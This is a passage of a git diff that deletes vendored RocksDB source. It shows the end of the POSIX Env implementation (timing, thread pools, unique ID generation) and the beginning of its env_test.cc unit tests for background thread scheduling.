-    if (f == nullptr) {
-      result->reset();
-      return IOError("when fopen a file for new logger", fname, errno);
-    } else {
-      int fd = fileno(f);
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-      fallocate(fd, FALLOC_FL_KEEP_SIZE, 0, 4 * 1024);
-#endif
-      SetFD_CLOEXEC(fd, nullptr);
-      result->reset(new PosixLogger(f, &PosixEnv::gettid, this));
-      return Status::OK();
-    }
-  }
-
-  virtual uint64_t NowMicros() override {
-    struct timeval tv;
-    gettimeofday(&tv, nullptr);
-    return static_cast<uint64_t>(tv.tv_sec) * 1000000 + tv.tv_usec;
-  }
-
-  virtual uint64_t NowNanos() override {
-#if defined(OS_LINUX) || defined(OS_FREEBSD) || defined(OS_AIX)
-    struct timespec ts;
-    clock_gettime(CLOCK_MONOTONIC, &ts);
-    return static_cast<uint64_t>(ts.tv_sec) * 1000000000 + ts.tv_nsec;
-#elif defined(OS_SOLARIS)
-    return gethrtime();
-#elif defined(__MACH__)
-    clock_serv_t cclock;
-    mach_timespec_t ts;
-    host_get_clock_service(mach_host_self(), CALENDAR_CLOCK, &cclock);
-    clock_get_time(cclock, &ts);
-    mach_port_deallocate(mach_task_self(), cclock);
-    return static_cast<uint64_t>(ts.tv_sec) * 1000000000 + ts.tv_nsec;
-#else
-    return std::chrono::duration_cast<std::chrono::nanoseconds>(
-       std::chrono::steady_clock::now().time_since_epoch()).count();
-#endif
-  }
-
-  virtual void SleepForMicroseconds(int micros) override { usleep(micros); }
-
-  virtual Status GetHostName(char* name, uint64_t len) override {
-    int ret = gethostname(name, static_cast<size_t>(len));
-    if (ret < 0) {
-      if (errno == EFAULT || errno == EINVAL)
-        return Status::InvalidArgument(strerror(errno));
-      else
-        return IOError("GetHostName", name, errno);
-    }
-    return Status::OK();
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) override {
-    time_t ret = time(nullptr);
-    if (ret == (time_t) -1) {
-      return IOError("GetCurrentTime", "", errno);
-    }
-    *unix_time = (int64_t) ret;
-    return Status::OK();
-  }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-                                 std::string* output_path) override {
-    if (db_path.find('/') == 0) {
-      *output_path = db_path;
-      return Status::OK();
-    }
-
-    char the_path[256];
-    char* ret = getcwd(the_path, 256);
-    if (ret == nullptr) {
-      return Status::IOError(strerror(errno));
-    }
-
-    *output_path = ret;
-    return Status::OK();
-  }
-
-  // Allow increasing the number of worker threads.
-  virtual void SetBackgroundThreads(int num, Priority pri) override {
-    assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-    thread_pools_[pri].SetBackgroundThreads(num);
-  }
-
-  virtual int GetBackgroundThreads(Priority pri) override {
-    assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-    return thread_pools_[pri].GetBackgroundThreads();
-  }
-
-  // Allow increasing the number of worker threads.
-  virtual void IncBackgroundThreadsIfNeeded(int num, Priority pri) override {
-    assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-    thread_pools_[pri].IncBackgroundThreadsIfNeeded(num);
-  }
-
-  virtual void LowerThreadPoolIOPriority(Priority pool = LOW) override {
-    assert(pool >= Priority::BOTTOM && pool <= Priority::HIGH);
-#ifdef OS_LINUX
-    thread_pools_[pool].LowerIOPriority();
-#endif
-  }
-
-  virtual std::string TimeToString(uint64_t secondsSince1970) override {
-    const time_t seconds = (time_t)secondsSince1970;
-    struct tm t;
-    int maxsize = 64;
-    std::string dummy;
-    dummy.reserve(maxsize);
-    dummy.resize(maxsize);
-    char* p = &dummy[0];
-    localtime_r(&seconds, &t);
-    snprintf(p, maxsize,
-             "%04d/%02d/%02d-%02d:%02d:%02d ",
-             t.tm_year + 1900,
-             t.tm_mon + 1,
-             t.tm_mday,
-             t.tm_hour,
-             t.tm_min,
-             t.tm_sec);
-    return dummy;
-  }
-
-  EnvOptions OptimizeForLogWrite(const EnvOptions& env_options,
-                                 const DBOptions& db_options) const override {
-    EnvOptions optimized = env_options;
-    optimized.use_mmap_writes = false;
-    optimized.use_direct_writes = false;
-    optimized.bytes_per_sync = db_options.wal_bytes_per_sync;
-    // TODO(icanadi) it's faster if fallocate_with_keep_size is false, but it
-    // breaks TransactionLogIteratorStallAtLastRecord unit test. Fix the unit
-    // test and make this false
-    optimized.fallocate_with_keep_size = true;
-    return optimized;
-  }
-
-  EnvOptions OptimizeForManifestWrite(
-      const EnvOptions& env_options) const override {
-    EnvOptions optimized = env_options;
-    optimized.use_mmap_writes = false;
-    optimized.use_direct_writes = false;
-    optimized.fallocate_with_keep_size = true;
-    return optimized;
-  }
-
- private:
-  bool checkedDiskForMmap_;
-  bool forceMmapOff_;  // do we override Env options?
-
-  // Returns true iff the named directory exists and is a directory.
-  virtual bool DirExists(const std::string& dname) {
-    struct stat statbuf;
-    if (stat(dname.c_str(), &statbuf) == 0) {
-      return S_ISDIR(statbuf.st_mode);
-    }
-    return false; // stat() failed return false
-  }
-
-  bool SupportsFastAllocate(const std::string& path) {
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-    struct statfs s;
-    if (statfs(path.c_str(), &s)){
-      return false;
-    }
-    switch (s.f_type) {
-      case EXT4_SUPER_MAGIC:
-        return true;
-      case XFS_SUPER_MAGIC:
-        return true;
-      case TMPFS_MAGIC:
-        return true;
-      default:
-        return false;
-    }
-#else
-    return false;
-#endif
-  }
-
-  size_t page_size_;
-
-  std::vector<ThreadPoolImpl> thread_pools_;
-  pthread_mutex_t mu_;
-  std::vector<pthread_t> threads_to_join_;
-};
-
-PosixEnv::PosixEnv()
-    : checkedDiskForMmap_(false),
-      forceMmapOff_(false),
-      page_size_(getpagesize()),
-      thread_pools_(Priority::TOTAL) {
-  ThreadPoolImpl::PthreadCall("mutex_init", pthread_mutex_init(&mu_, nullptr));
-  for (int pool_id = 0; pool_id < Env::Priority::TOTAL; ++pool_id) {
-    thread_pools_[pool_id].SetThreadPriority(
-        static_cast<Env::Priority>(pool_id));
-    // This allows later initializing the thread-local-env of each thread.
-    thread_pools_[pool_id].SetHostEnv(this);
-  }
-  thread_status_updater_ = CreateThreadStatusUpdater();
-}
-
-void PosixEnv::Schedule(void (*function)(void* arg1), void* arg, Priority pri,
-                        void* tag, void (*unschedFunction)(void* arg)) {
-  assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-  thread_pools_[pri].Schedule(function, arg, tag, unschedFunction);
-}
-
-int PosixEnv::UnSchedule(void* arg, Priority pri) {
-  return thread_pools_[pri].UnSchedule(arg);
-}
-
-unsigned int PosixEnv::GetThreadPoolQueueLen(Priority pri) const {
-  assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH);
-  return thread_pools_[pri].GetQueueLen();
-}
-
-struct StartThreadState {
-  void (*user_function)(void*);
-  void* arg;
-};
-
-static void* StartThreadWrapper(void* arg) {
-  StartThreadState* state = reinterpret_cast<StartThreadState*>(arg);
-  state->user_function(state->arg);
-  delete state;
-  return nullptr;
-}
-
-void PosixEnv::StartThread(void (*function)(void* arg), void* arg) {
-  pthread_t t;
-  StartThreadState* state = new StartThreadState;
-  state->user_function = function;
-  state->arg = arg;
-  ThreadPoolImpl::PthreadCall(
-      "start thread", pthread_create(&t, nullptr, &StartThreadWrapper, state));
-  ThreadPoolImpl::PthreadCall("lock", pthread_mutex_lock(&mu_));
-  threads_to_join_.push_back(t);
-  ThreadPoolImpl::PthreadCall("unlock", pthread_mutex_unlock(&mu_));
-}
-
-void PosixEnv::WaitForJoin() {
-  for (const auto tid : threads_to_join_) {
-    pthread_join(tid, nullptr);
-  }
-  threads_to_join_.clear();
-}
-
-}  // namespace
-
-std::string Env::GenerateUniqueId() {
-  std::string uuid_file = "/proc/sys/kernel/random/uuid";
-
-  Status s = FileExists(uuid_file);
-  if (s.ok()) {
-    std::string uuid;
-    s = ReadFileToString(this, uuid_file, &uuid);
-    if (s.ok()) {
-      return uuid;
-    }
-  }
-  // Could not read uuid_file - generate uuid using "nanos-random"
-  Random64 r(time(nullptr));
-  uint64_t random_uuid_portion =
-    r.Uniform(std::numeric_limits<uint64_t>::max());
-  uint64_t nanos_uuid_portion = NowNanos();
-  char uuid2[200];
-  snprintf(uuid2,
-           200,
-           "%lx-%lx",
-           (unsigned long)nanos_uuid_portion,
-           (unsigned long)random_uuid_portion);
-  return uuid2;
-}
-
-//
-// Default Posix Env
-//
-Env* Env::Default() {
-  // The following function call initializes the singletons of ThreadLocalPtr
-  // right before the static default_env.  This guarantees default_env will
-  // always being destructed before the ThreadLocalPtr singletons get
-  // destructed as C++ guarantees that the destructions of static variables
-  // is in the reverse order of their constructions.
-  //
-  // Since static members are destructed in the reverse order
-  // of their construction, having this call here guarantees that
-  // the destructor of static PosixEnv will go first, then the
-  // the singletons of ThreadLocalPtr.
-  ThreadLocalPtr::InitSingletons();
-  static PosixEnv default_env;
-  return &default_env;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env_test.cc b/thirdparty/rocksdb/env/env_test.cc
deleted file mode 100644
index 9ec2f14..0000000
--- a/thirdparty/rocksdb/env/env_test.cc
+++ /dev/null
@@ -1,1498 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef OS_WIN
-#include <sys/ioctl.h>
-#endif
-
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-#ifdef OS_FREEBSD
-#include <malloc_np.h>
-#else
-#include <malloc.h>
-#endif
-#endif
-#include <sys/types.h>
-
-#include <iostream>
-#include <unordered_set>
-#include <atomic>
-#include <list>
-
-#ifdef OS_LINUX
-#include <fcntl.h>
-#include <linux/fs.h>
-#include <stdlib.h>
-#include <sys/stat.h>
-#include <unistd.h>
-#endif
-
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-#include <errno.h>
-#endif
-
-#include "env/env_chroot.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/log_buffer.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifdef OS_LINUX
-static const size_t kPageSize = sysconf(_SC_PAGESIZE);
-#else
-static const size_t kPageSize = 4 * 1024;
-#endif
-
-namespace rocksdb {
-
-static const int kDelayMicros = 100000;
-
-struct Deleter {
-  explicit Deleter(void (*fn)(void*)) : fn_(fn) {}
-
-  void operator()(void* ptr) {
-    assert(fn_);
-    assert(ptr);
-    (*fn_)(ptr);
-  }
-
-  void (*fn_)(void*);
-};
-
-std::unique_ptr<char, Deleter> NewAligned(const size_t size, const char ch) {
-  char* ptr = nullptr;
-#ifdef OS_WIN
-  if (!(ptr = reinterpret_cast<char*>(_aligned_malloc(size, kPageSize)))) {
-    return std::unique_ptr<char, Deleter>(nullptr, Deleter(_aligned_free));
-  }
-  std::unique_ptr<char, Deleter> uptr(ptr, Deleter(_aligned_free));
-#else
-  if (posix_memalign(reinterpret_cast<void**>(&ptr), kPageSize, size) != 0) {
-    return std::unique_ptr<char, Deleter>(nullptr, Deleter(free));
-  }
-  std::unique_ptr<char, Deleter> uptr(ptr, Deleter(free));
-#endif
-  memset(uptr.get(), ch, size);
-  return uptr;
-}
-
-class EnvPosixTest : public testing::Test {
- private:
-  port::Mutex mu_;
-  std::string events_;
-
- public:
-  Env* env_;
-  bool direct_io_;
-  EnvPosixTest() : env_(Env::Default()), direct_io_(false) {}
-};
-
-class EnvPosixTestWithParam
-    : public EnvPosixTest,
-      public ::testing::WithParamInterface<std::pair<Env*, bool>> {
- public:
-  EnvPosixTestWithParam() {
-    std::pair<Env*, bool> param_pair = GetParam();
-    env_ = param_pair.first;
-    direct_io_ = param_pair.second;
-  }
-
-  void WaitThreadPoolsEmpty() {
-    // Wait until the thread pools are empty.
-    while (env_->GetThreadPoolQueueLen(Env::Priority::LOW) != 0) {
-      Env::Default()->SleepForMicroseconds(kDelayMicros);
-    }
-    while (env_->GetThreadPoolQueueLen(Env::Priority::HIGH) != 0) {
-      Env::Default()->SleepForMicroseconds(kDelayMicros);
-    }
-  }
-
-  ~EnvPosixTestWithParam() { WaitThreadPoolsEmpty(); }
-};
-
-static void SetBool(void* ptr) {
-  reinterpret_cast<std::atomic<bool>*>(ptr)->store(true);
-}
-
-TEST_F(EnvPosixTest, RunImmediately) {
-  for (int pri = Env::BOTTOM; pri < Env::TOTAL; ++pri) {
-    std::atomic<bool> called(false);
-    env_->SetBackgroundThreads(1, static_cast<Env::Priority>(pri));
-    env_->Schedule(&SetBool, &called, static_cast<Env::Priority>(pri));
-    Env::Default()->SleepForMicroseconds(kDelayMicros);
-    ASSERT_TRUE(called.load());
-  }
-}
-
-TEST_P(EnvPosixTestWithParam, UnSchedule) {
-  std::atomic<bool> called(false);
-  env_->SetBackgroundThreads(1, Env::LOW);
-
-  /* Block the low priority queue */
-  test::SleepingBackgroundTask sleeping_task, sleeping_task1;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::LOW);
-
-  /* Schedule another task */
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task1,
-                 Env::Priority::LOW, &sleeping_task1);
-
-  /* Remove it with a different tag  */
-  ASSERT_EQ(0, env_->UnSchedule(&called, Env::Priority::LOW));
-
-  /* Remove it from the queue with the right tag */
-  ASSERT_EQ(1, env_->UnSchedule(&sleeping_task1, Env::Priority::LOW));
-
-  // Unblock background thread
-  sleeping_task.WakeUp();
-
-  /* Schedule another task */
-  env_->Schedule(&SetBool, &called);
-  for (int i = 0; i < kDelayMicros; i++) {
-    if (called.load()) {
-      break;
-    }
-    Env::Default()->SleepForMicroseconds(1);
-  }
-  ASSERT_TRUE(called.load());
-
-  ASSERT_TRUE(!sleeping_task.IsSleeping() && !sleeping_task1.IsSleeping());
-  WaitThreadPoolsEmpty();
-}
-
-TEST_P(EnvPosixTestWithParam, RunMany) {
-  std::atomic<int> last_id(0);
-
-  struct CB {
-    std::atomic<int>* last_id_ptr;  // Pointer to shared slot
-    int id;                         // Order# for the execution of this callback
-
-    CB(std::atomic<int>* p, int i) : last_id_ptr(p), id(i) {}
-
-    static void Run(void* v) {
-      CB* cb = reinterpret_cast<CB*>(v);
-      int cur = cb->last_id_ptr->load();
-      ASSERT_EQ(cb->id - 1, cur);
-      cb->last_id_ptr->store(cb->id);
-    }
-  };
-
-  // Schedule in different order than start time
-  CB cb1(&last_id, 1);
-  CB cb2(&last_id, 2);
-  CB cb3(&last_id, 3);
-  CB cb4(&last_id, 4);
-  env_->Schedule(&CB::Run, &cb1);
-  env_->Schedule(&CB::Run, &cb2);
-  env_->Schedule(&CB::Run, &cb3);
-  env_->Schedule(&CB::Run, &cb4);
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  int cur = last_id.load(std::memory_order_acquire);
-  ASSERT_EQ(4, cur);
-  WaitThreadPoolsEmpty();
-}
-
-struct State {
-  port::Mutex mu;
-  int val;
-  int num_running;
-};
-
-static void ThreadBody(void* arg) {
-  State* s = reinterpret_cast<State*>(arg);
-  s->mu.Lock();
-  s->val += 1;
-  s->num_running -= 1;
-  s->mu.Unlock();
-}
-
-TEST_P(EnvPosixTestWithParam, StartThread) {
-  State state;
-  state.val = 0;
-  state.num_running = 3;
-  for (int i = 0; i < 3; i++) {
-    env_->StartThread(&ThreadBody, &state);
-  }
-  while (true) {
-    state.mu.Lock();
-    int num = state.num_running;
-    state.mu.Unlock();
-    if (num == 0) {
-      break;
-    }
-    Env::Default()->SleepForMicroseconds(kDelayMicros);
-  }
-  ASSERT_EQ(state.val, 3);
-  WaitThreadPoolsEmpty();
-}
-
-TEST_P(EnvPosixTestWithParam, TwoPools) {
-  // Data structures to signal tasks to run.
-  port::Mutex mutex;
-  port::CondVar cv(&mutex);
-  bool should_start = false;
-
-  class CB {
-   public:
-    CB(const std::string& pool_name, int pool_size, port::Mutex* trigger_mu,
-       port::CondVar* trigger_cv, bool* _should_start)
-        : mu_(),
-          num_running_(0),
-          num_finished_(0),
-          pool_size_(pool_size),
-          pool_name_(pool_name),
-          trigger_mu_(trigger_mu),
-          trigger_cv_(trigger_cv),
-          should_start_(_should_start) {}
-
-    static void Run(void* v) {
-      CB* cb = reinterpret_cast<CB*>(v);
-      cb->Run();
-    }
-
-    void Run() {
-      {
-        MutexLock l(&mu_);
-        num_running_++;
-        // make sure we don't have more than pool_size_ jobs running.
-        ASSERT_LE(num_running_, pool_size_.load());
-      }
-
-      {
-        MutexLock l(trigger_mu_);
-        while (!(*should_start_)) {
-          trigger_cv_->Wait();
-        }
-      }
-
-      {
-        MutexLock l(&mu_);
-        num_running_--;
-        num_finished_++;
-      }
-    }
-
-    int NumFinished() {
-      MutexLock l(&mu_);
-      return num_finished_;
-    }
-
-    void Reset(int pool_size) {
-      pool_size_.store(pool_size);
-      num_finished_ = 0;
-    }
-
-   private:
-    port::Mutex mu_;
-    int num_running_;
-    int num_finished_;
-    std::atomic<int> pool_size_;
-    std::string pool_name_;
-    port::Mutex* trigger_mu_;
-    port::CondVar* trigger_cv_;
-    bool* should_start_;
-  };
-
-  const int kLowPoolSize = 2;
-  const int kHighPoolSize = 4;
-  const int kJobs = 8;
-
-  CB low_pool_job("low", kLowPoolSize, &mutex, &cv, &should_start);
-  CB high_pool_job("high", kHighPoolSize, &mutex, &cv, &should_start);
-
-  env_->SetBackgroundThreads(kLowPoolSize);
-  env_->SetBackgroundThreads(kHighPoolSize, Env::Priority::HIGH);
-
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // schedule same number of jobs in each pool
-  for (int i = 0; i < kJobs; i++) {
-    env_->Schedule(&CB::Run, &low_pool_job);
-    env_->Schedule(&CB::Run, &high_pool_job, Env::Priority::HIGH);
-  }
-  // Wait a short while for the jobs to be dispatched.
-  int sleep_count = 0;
-  while ((unsigned int)(kJobs - kLowPoolSize) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::LOW) ||
-         (unsigned int)(kJobs - kHighPoolSize) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::HIGH)) {
-    env_->SleepForMicroseconds(kDelayMicros);
-    if (++sleep_count > 100) {
-      break;
-    }
-  }
-
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen());
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ((unsigned int)(kJobs - kHighPoolSize),
-            env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // Trigger jobs to run.
-  {
-    MutexLock l(&mutex);
-    should_start = true;
-    cv.SignalAll();
-  }
-
-  // wait for all jobs to finish
-  while (low_pool_job.NumFinished() < kJobs ||
-         high_pool_job.NumFinished() < kJobs) {
-    env_->SleepForMicroseconds(kDelayMicros);
-  }
-
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // Hold jobs to schedule;
-  should_start = false;
-
-  // call IncBackgroundThreadsIfNeeded to two pools. One increasing and
-  // the other decreasing
-  env_->IncBackgroundThreadsIfNeeded(kLowPoolSize - 1, Env::Priority::LOW);
-  env_->IncBackgroundThreadsIfNeeded(kHighPoolSize + 1, Env::Priority::HIGH);
-  high_pool_job.Reset(kHighPoolSize + 1);
-  low_pool_job.Reset(kLowPoolSize);
-
-  // schedule same number of jobs in each pool
-  for (int i = 0; i < kJobs; i++) {
-    env_->Schedule(&CB::Run, &low_pool_job);
-    env_->Schedule(&CB::Run, &high_pool_job, Env::Priority::HIGH);
-  }
-  // Wait a short while for the jobs to be dispatched.
-  sleep_count = 0;
-  while ((unsigned int)(kJobs - kLowPoolSize) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::LOW) ||
-         (unsigned int)(kJobs - (kHighPoolSize + 1)) !=
-             env_->GetThreadPoolQueueLen(Env::Priority::HIGH)) {
-    env_->SleepForMicroseconds(kDelayMicros);
-    if (++sleep_count > 100) {
-      break;
-    }
-  }
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen());
-  ASSERT_EQ((unsigned int)(kJobs - kLowPoolSize),
-            env_->GetThreadPoolQueueLen(Env::Priority::LOW));
-  ASSERT_EQ((unsigned int)(kJobs - (kHighPoolSize + 1)),
-            env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  // Trigger jobs to run.
-  {
-    MutexLock l(&mutex);
-    should_start = true;
-    cv.SignalAll();
-  }
-
-  // wait for all jobs to finish
-  while (low_pool_job.NumFinished() < kJobs ||
-         high_pool_job.NumFinished() < kJobs) {
-    env_->SleepForMicroseconds(kDelayMicros);
-  }
-
-  env_->SetBackgroundThreads(kHighPoolSize, Env::Priority::HIGH);
-  WaitThreadPoolsEmpty();
-}
-
-TEST_P(EnvPosixTestWithParam, DecreaseNumBgThreads) {
-  std::vector<test::SleepingBackgroundTask> tasks(10);
-
-  // Set number of thread to 1 first.
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-
-  // Schedule 3 tasks. 0 running; Task 1, 2 waiting.
-  for (size_t i = 0; i < 3; i++) {
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[i],
-                   Env::Priority::HIGH);
-    Env::Default()->SleepForMicroseconds(kDelayMicros);
-  }
-  ASSERT_EQ(2U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(!tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // Increase to 2 threads. Task 0, 1 running; 2 waiting
-  env_->SetBackgroundThreads(2, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(1U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // Shrink back to 1 thread. Still task 0, 1 running, 2 waiting
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(1U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // The last task finishes. Task 0 running, 2 waiting.
-  tasks[1].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(1U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(!tasks[1].IsSleeping());
-  ASSERT_TRUE(!tasks[2].IsSleeping());
-
-  // Increase to 5 threads. Task 0 and 2 running.
-  env_->SetBackgroundThreads(5, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ((unsigned int)0, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[0].IsSleeping());
-  ASSERT_TRUE(tasks[2].IsSleeping());
-
-  // Change number of threads a couple of times while there is no sufficient
-  // tasks.
-  env_->SetBackgroundThreads(7, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  tasks[2].WakeUp();
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(3, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(4, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(5, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  env_->SetBackgroundThreads(4, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(0U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros * 50);
-
-  // Enqueue 5 more tasks. Thread pool size now is 4.
-  // Task 0, 3, 4, 5 running;6, 7 waiting.
-  for (size_t i = 3; i < 8; i++) {
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[i],
-                   Env::Priority::HIGH);
-  }
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ(2U, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[3].IsSleeping());
-  ASSERT_TRUE(tasks[4].IsSleeping());
-  ASSERT_TRUE(tasks[5].IsSleeping());
-  ASSERT_TRUE(!tasks[6].IsSleeping());
-  ASSERT_TRUE(!tasks[7].IsSleeping());
-
-  // Wake up task 0, 3 and 4. Task 5, 6, 7 running.
-  tasks[0].WakeUp();
-  tasks[3].WakeUp();
-  tasks[4].WakeUp();
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ((unsigned int)0, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  for (size_t i = 5; i < 8; i++) {
-    ASSERT_TRUE(tasks[i].IsSleeping());
-  }
-
-  // Shrink back to 1 thread. Still task 5, 6, 7 running
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(tasks[5].IsSleeping());
-  ASSERT_TRUE(tasks[6].IsSleeping());
-  ASSERT_TRUE(tasks[7].IsSleeping());
-
-  // Wake up task  6. Task 5, 7 running
-  tasks[6].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(tasks[5].IsSleeping());
-  ASSERT_TRUE(!tasks[6].IsSleeping());
-  ASSERT_TRUE(tasks[7].IsSleeping());
-
-  // Wake up threads 7. Task 5 running
-  tasks[7].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[7].IsSleeping());
-
-  // Enqueue thread 8 and 9. Task 5 running; one of 8, 9 might be running.
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[8],
-                 Env::Priority::HIGH);
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[9],
-                 Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_GT(env_->GetThreadPoolQueueLen(Env::Priority::HIGH), (unsigned int)0);
-  ASSERT_TRUE(!tasks[8].IsSleeping() || !tasks[9].IsSleeping());
-
-  // Increase to 4 threads. Task 5, 8, 9 running.
-  env_->SetBackgroundThreads(4, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ((unsigned int)0, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[8].IsSleeping());
-  ASSERT_TRUE(tasks[9].IsSleeping());
-
-  // Shrink to 1 thread
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
-
-  // Wake up thread 9.
-  tasks[9].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[9].IsSleeping());
-  ASSERT_TRUE(tasks[8].IsSleeping());
-
-  // Wake up thread 8
-  tasks[8].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[8].IsSleeping());
-
-  // Wake up the last thread
-  tasks[5].WakeUp();
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[5].IsSleeping());
-  WaitThreadPoolsEmpty();
-}
-
-#if (defined OS_LINUX || defined OS_WIN)
-// Travis doesn't support fallocate or getting unique ID from files for whatever
-// reason.
-#ifndef TRAVIS
-
-namespace {
-bool IsSingleVarint(const std::string& s) {
-  Slice slice(s);
-
-  uint64_t v;
-  if (!GetVarint64(&slice, &v)) {
-    return false;
-  }
-
-  return slice.size() == 0;
-}
-
-bool IsUniqueIDValid(const std::string& s) {
-  return !s.empty() && !IsSingleVarint(s);
-}
-
-const size_t MAX_ID_SIZE = 100;
-char temp_id[MAX_ID_SIZE];
-
-
-}  // namespace
-
-// Determine whether we can use the FS_IOC_GETVERSION ioctl
-// on a file in directory DIR.  Create a temporary file therein,
-// try to apply the ioctl (save that result), cleanup and
-// return the result.  Return true if it is supported, and
-// false if anything fails.
-// Note that this function "knows" that dir has just been created
-// and is empty, so we create a simply-named test file: "f".
-bool ioctl_support__FS_IOC_GETVERSION(const std::string& dir) {
-#ifdef OS_WIN
-  return true;
-#else
-  const std::string file = dir + "/f";
-  int fd;
-  do {
-    fd = open(file.c_str(), O_CREAT | O_RDWR | O_TRUNC, 0644);
-  } while (fd < 0 && errno == EINTR);
-  long int version;
